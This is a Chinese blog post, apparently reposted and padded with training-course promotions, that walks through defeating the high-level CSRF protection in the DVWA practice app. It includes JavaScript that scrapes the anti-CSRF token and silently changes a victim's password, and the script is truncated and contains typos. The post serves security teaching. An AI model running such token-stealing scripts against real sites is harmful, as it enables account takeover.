2024年网络安全最新DVWA中CSRF高级_dvwa csrf 高级(3),2024年最新腾讯网络安全面经

于 2024-05-12 04:23:14 发布
阅读量274 收藏 5
点赞数 3
分类专栏: 程序员 文章标签: 网络安全 学习 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84132644/article/details/138739127
版权

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

<form action="#" method="GET">
            New password:<br />
            <input type="password" AUTOCOMPLETE="off" name="password_new"><br />
            Confirm new password:<br />
            <input type="password" AUTOCOMPLETE="off" name="password_conf"><br />
            <br />
            <input type="submit" value="Change" name="Change">
            <input type='hidden' name='user_token' value='9eed4c773cd578ed263facc427c1fb78' />
        </form>

(2)再次访问CSRF页面Token值发生了变化,可以确定DVWA生成Token的机制是每次不一样/

(3)过关的核心在于要发送请求给

http://192.168.112.188/dvwa/vulnerabilities/csrf/

页面,然后从相应中取得Token(通过正则表达式提取)取得后在将Token和新密发一起发送给

http:192.168.112.188/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change

页面完成密码修改

(4)先构造一个Javascript原生代码发送AJAX请求的代码

var tokenUrl='http://192.168.112.188/dvwa/vulnerabilities/csrf/';
var count = 0;
//实例化XMLHttpRequest,用于发送AJAX请求
xmlhttp = new XMLHttpRequest();
//当请求状态发生变化时,触发执行代码
xmlhttp.onreadystatechange = function(){
    //状态码0:请求未初始化,1:服务器连接已建立,2请求已接收,3请求处理中,4请求已完成,且相应已就绪
    if(xmlhttp.readyState == 4&&xmlhttp.status == 200)
    {
        //取得请求的响应,并从响应中通过正则提取Token
        var text = xmlhttp.responesText;
        var regex = /user_token\'value\=\'(.*?)\' \/\>/;
        var match = text.match(regex);
        //alert(match[1]);
        var token = match[1];
        //发送修改密码的语法
        var changeUrl='http:192.168.112.188/dvwa/vulnerabilities/csrf/?user_token='+token+'&                    password_new=123456&password_conf=123456&Change=Change';
        if(count == 0){
            count = 1; //只发送一次,否则会多次发送
            xmlhttp.open("GET",changeUrl,false); //false代表同步方式发送
            xmlhttp.send();


## 学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/7a04c5d629f1415a9e35662316578e07.png#pic_center)





**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/forums/4f45ff00ff254613a03fab5e56a57acb)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2401_84132644
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA-CSRF跨站请求伪造 -High级别
xmj818719的博客
02-27 1447
基础知识介绍csrf攻击流程 实验环境: CSRF模拟攻击环境(这里是内网环境,公网只需要对端口进行映射即可,其他操作同理) CentOS7 DVWA服务器(模拟转账系统) 192.168.0.9 kali 黑客(攻击者) 192.168.0.2 Win10 用户(受害者) 192.168.0.5 1使用条件: 1、使用关闭XSS的chrome浏览器 新建chrome浏览器快捷方式 “C:\Program Files (x86)\Google\Chrome\chrome-xss.e
DVWACSRF
RexHa的博客
09-30 7442
CSRF,跨站域请求伪造,通常攻击者会伪造一个场景(例如一条链接),来诱使用户点击,用户一旦点击,黑客的攻击目的也就达到了,他可以盗用你的身份,以你的名义发送恶意请求。
DVWACSRF高级
m0_73896875的博客
07-11 280
(2)再次访问CSRF页面Token值发生了变化,可以确定DVWA生成Token的机制是每次不一样/页面,然后从相应取得Token(通过正则表达式提取)取得后在将Token和新密发一起发送给。处理方式:先切换到Low级,在留言本里注入以下脚本,然后在切换到High级,直接触发改密。(High级别无法实现)(4)先构造一个Javascript原生代码发送AJAX请求的代码。(1)访问CSRF页面,在页面的源代码可以看到生成的Token。在high级别,屏蔽了标签,所以无法直接利用。
DVWA】14. CSRF(High+Impossible)
Zichel77的博客
12-21 1052
因为该请求是get请求,所以token验证会被放在请求URL,我们随便输入密码验证一下,可以看到,在请求的URL最末尾加入了token。除了我们输入的新密码和确认密码之外,还有user-token的参数被我们捕获,以上框出来的内容都是URL里面出现的,真正需要的是发送后的不回显的token。所以现在要想进行CSRF攻击就必须获取到用户的token,而要想获取到 token 就必须利用用户的 cookie 值去访问修改密码的页面,然后截取服务器返回的token值。函数来对密码进行转义。
DVWA-CSRF跨站请求伪造全等级绕过方法
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-17 3634
CSRF--DVWA全等级绕过前言一、low级别二、Medium级别三、High级别四、Impossible级别总结 前言 CSRF,跨站请求伪造,Cross-site request forgery 受害者:用户在当前已登录的Web应用程序上执行非本意的操作。 攻击者:攻击者欺骗浏览器,让其以受害者的名义执行自己想要的操作。 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 总结     本站所有文章均为原创,欢迎转载,请注明文章
pikachu,dvwacsrf详细步骤
05-17
6. DVWACSRF漏洞级别:在DVWACSRF漏洞有不同的安全级别,如Low和Medium。在Low级别,没有使用CSRF Token,因此可以直接构造链接进行攻击。而在Medium级别,虽然源代码仍未见Token,但可能有其他形式的防护...
网络安全靶场(dvwa).7z
01-29
网络安全靶场(DVWA):新手到高手的实践之旅》 网络安全靶场(Damn Vulnerable Web Application,简称DVWA)是一个开源的Web应用程序,专为教育和测试网络安全技能而设计。它模拟了一系列常见的Web应用漏洞,...
DVWA网络安全
05-18
**DVWA网络安全** DVWA(Damn Vulnerable Web Application)是一个非常知名的开源Web应用程序,由Chris Evans创建,旨在帮助安全专业人员、开发人员和学生学习和理解常见Web应用程序安全漏洞。这个应用提供了各种...
网络安全原理与应用:DVWA平台搭建.pptx
05-16
Web应用安全是一个至关重要的领域,尤其是在数字化日益普及的今天。DVWA(Damn Vulnerable Web Application)是一个专门为安全...对于从事Web开发、安全审计或者网络安全教学的人来说,DVWA是一个非常有价值的资源。
跨站攻击(XSS+CSRF).docx
最新发布
01-05
总结来说,XSS和CSRF是两种常见的Web安全威胁,理解和掌握这两种攻击的原理、实施方式以及防护措施是保障网络安全的重要一环。通过实际操作和理论学习,学生将深化对Web安全的理解,提高应对网络攻击的能力。
DVWA csrf高级
weixin_69374202的博客
05-25 303
受害者主机ip 192.168.11.59(虚拟机)攻击者主机ip : 192.168.11.30(物理机)测试网络连通性。
Dvwa csrf之low、medium、high级别漏洞实战
永不垂头的博客
08-11 5075
Dvwa csrf高级别漏洞实战 Low 源代码如下: GLOBALS:引用全局作用域可用的全部变量。GLOBALS :引用全局作用域可用的全部变量。GLOBALS:引用全局作用域可用的全部变量。GLOBALS 这种全局变量用于在 PHP 脚本的任意位置访问全局变量(从函数或方法均可)。PHP 在名为 $GLOBALS[index] 的数组存储了所有全局变量。变量的名字就是数组的键。 从源代码可以看出这里只是对用户输入的两个密码进行判断,看是否相等。不相等就提示密码不匹配。 相等的话,查看
代码审计—DVWACSRF—high
王嘟嘟的博客
10-31 961
0x00 前言 如饥似渴的学习ing。 你可能需要看看: https://blog.csdn.net/qq_36869808/article/details/83029980 0x01 start 1.黑盒测试 发现这里带了Token。 说实话我不会利用,哈哈。直接白盒看看吧。 白盒 通过和这个来判断Token,但是这里网上都说可以通过xss来获取session来进行判断。然后进行伪造等等,但...
dvwa_csrf攻击_high
weixin_30492601的博客
02-18 327
dvwa_csrf攻击_high <script type="text/javascript"> function attack() { document.getElementsByName('user_token')[0].value=document.getElementById("hack")....
DVWA1.10_CSRF
whime
07-11 330
LOW 服务器收到提交的新密码和确认密码之后,比较是否相同,相同则修改密码,没有任何防护机制。此处可以简单构造带有参数的链接诱导用户点击: http://192.168.29.128/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change# 但是点击之后会出现修改成功页面,用户很容易发现密码已经被修改了。 攻击者还可以诱导用户访问特定页面,将链接隐藏在标签.
DVWACSRF-High跨站请求伪造高级
qq_39330735的博客
02-09 435
DVWACSRF-High跨站请求伪造高级,通过XSS漏洞联合使用的方法来实现。
DVWACSRF_全级别
weixin_45378289的博客
07-04 355
1.low级别 <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the passwords match? if( $pass_new == $pass_conf ) { // They do! $pass
DVWA靶场之CSRF通关详解
qq_62169455的博客
06-27 2853
CSRF的形成原因主要是由于Web应用程序没有充分验证请求来源的问题。正常的请求必须携带正确的Cookie信息,而攻击者可以构造一个恶意网站,在其包含一个发送CSRF请求的链接或表单,当用户访问这个网站时,浏览器会自动发送CSRF请求到被攻击的网站,从而实现攻击。这里查看源码,与刚刚的low等级比较发现,这里只有一个等级发生了改变,即在传入密码和确认密码参数前先进行了一个if语句的判断,判断里面的内容主要是验证这个访问请求是否从dvwa网站本身发起的,如果不是这个网站发起的请求,后面的操作就不执行。
DVWA —— Cross Site Request Forgery (CSRF) 跨站请求伪造
YouTheFreedom的博客
05-22 631
跨站请求伪造(英语:Cross-siterequest forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF ,是一种挟制用户在当前已登录的 Web 应用程序上执行非本意的操作的攻击方法。因为是模仿受害者点击该连接实现密码修改,所以需要点击该链接提交表单时也需要受害者在网站上处于登陆状态,而且登陆后浏览器保存了验证身份的 cookie 等信息,所以登陆网站的浏览器也要与之前相同,否则身份验证不成功,就无法成功修改用户密码了。
dvwa+csrf高级
10-14
DVWA(Damn Vulnerable Web Application)是一个用于练习Web应用程序渗透测试的漏洞演示平台,而CSRF(Cross-Site Request Forgery)则是一种常见的Web应用程序安全漏洞。在DVWA,可以通过模拟CSRF攻击来学习和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值